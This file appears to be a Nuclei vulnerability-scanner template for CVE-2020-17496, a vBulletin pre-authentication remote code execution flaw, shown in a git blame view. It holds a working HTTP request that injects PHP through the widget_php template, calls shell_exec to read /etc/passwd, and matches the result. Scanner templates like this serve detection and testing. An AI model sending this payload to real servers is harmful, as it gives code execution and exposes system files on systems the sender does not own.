nuclei-templates/cves/2020/CVE-2020-17496.yaml

24 lines
670 B
YAML
Raw Normal View History

2021-02-24 20:00:52 +00:00
id: CVE-2020-17496
info:
name: vBulletin Pre-Auth RCE
2021-02-24 20:42:51 +00:00
author: pussycat0x,kettelabs
2021-02-24 20:00:52 +00:00
severity: high
reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed
tags: cve,cve2020,vbulletin
requests:
2021-02-24 20:54:26 +00:00
- raw:
- |
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
Host: {{Hostname}}
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;
2021-02-24 20:00:52 +00:00
matchers-condition: and
matchers:
-type: regex
regex:
-"root:[x*]:0:0"
-type: status
status:
2021-02-24 20:41:02 +00:00
-200